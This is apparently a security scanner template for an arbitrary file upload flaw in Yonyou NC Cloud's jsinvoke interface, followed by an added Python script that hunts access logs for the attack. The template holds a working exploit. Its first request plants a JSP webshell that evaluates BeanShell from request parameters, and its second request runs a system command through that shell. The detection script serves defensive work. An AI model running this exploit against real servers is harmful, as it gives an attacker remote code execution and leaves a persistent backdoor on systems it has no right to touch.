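Vulnerability description
The jsinvoke interface of Yonyou NC Cloud has an arbitrary file upload vulnerability. An attacker can exploit it to upload arbitrary files to the server and obtain system privileges.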
app="用友-NC-Cloud"
id: yonyou-cloud-jsinvoke-uploadfile
info:
  name: 用友 NC Cloud jsinvoke 任意文件上传
  author: zan8in
  severity: critical
  verified: true
  description: |
    用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器中,获取系统权限
    app="用友-NC-Cloud"
  reference:
    - https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20NC%20Cloud%20jsinvoke%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
  tags: yonyou,fileupload
  created: 2023/08/09
set:
  r1: randomLowercase(6)
rules:
  r0:
    request:
      method: POST
      path: /uapjs/jsinvoke/?action=invoke
      headers:
        Content-Type: application/json
      body: |
        {
          "serviceName":"nc.itf.iufo.IBaseSPService",
          "methodName":"saveXStreamConfig",
          "parameterTypes":[
            "java.lang.Object",
            "java.lang.String"
          ],
          "parameters":[
            "${param.getClass().forName(param.error).newInstance().eval(param.cmd)}",
            "webapps/nc_web/{{r1}}.jsp"
          ]
        }
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /{{r1}}.jsp?error=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(%22whoami%22).getInputStream())
    expression: |
      response.status == 200 &&
      response.body.ibcontains(b'<string>') &&
      response.body.ibcontains(b'<string>') &&
      response.body.ibcontains(b'</string>') &&
      response.body.ibcontains(b'<?xml') &&
      (response.body.ibcontains(b'administrator') || response.body.ibcontains(b'root'))
expression: r0() && r1()
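
The two requests in this template leave a recognisable pair of entries in a web access log, which a defender can hunt for. The Python below is an added example, not part of the original template: the combined-log line format, the sample lines (constructed, with documentation IP addresses and a redacted `cmd` value) and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [09/Aug/2023:10:00:01 +0800] "GET /nccloud/index.html HTTP/1.1" 200 5120
198.51.100.7 - - [09/Aug/2023:10:00:05 +0800] "POST /uapjs/jsinvoke/?action=invoke HTTP/1.1" 200 0
198.51.100.7 - - [09/Aug/2023:10:00:06 +0800] "GET /kqzpwx.jsp?error=bsh.Interpreter&cmd=REDACTED HTTP/1.1" 200 312
192.0.2.10 - - [09/Aug/2023:10:00:09 +0800] "GET /login.jsp?error=badpass HTTP/1.1" 200 2048
"""
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(method, target):
    """Return 'invoke', 'probe' or None for one request."""
    url = urlsplit(target)
    query = parse_qs(url.query, keep_blank_values=True)
    path = url.path.lower().rstrip("/")
    if method == "POST" and path == "/uapjs/jsinvoke" and "invoke" in query.get("action", []):
        return "invoke"
    # The template's second request: a .jsp called with both error= and cmd=.
    if path.endswith(".jsp") and "error" in query and "cmd" in query:
        return "probe"
    return None

def find_suspects(log_text):
    """Map client IP -> ordered list of (stage, status, target) hits."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, method, target, status = m.groups()
        stage = classify(method, target)
        if stage:
            hits.setdefault(ip, []).append((stage, int(status), target))
    return hits

def confirmed_chain(hits):
    """IPs whose 'invoke' call was followed by a 'probe' answered with 200."""
    out = []
    for ip, events in hits.items():
        stages = [s for s, _, _ in events]
        if "invoke" in stages:
            later = events[stages.index("invoke") + 1:]
            if any(s == "probe" and code == 200 for s, code, _ in later):
                out.append(ip)
    return sorted(out)
```

Any address returned by `confirmed_chain` warrants checking `webapps/nc_web/` for unexpected `.jsp` files; a lone `invoke` hit is weaker evidence, since the log does not show the POST body.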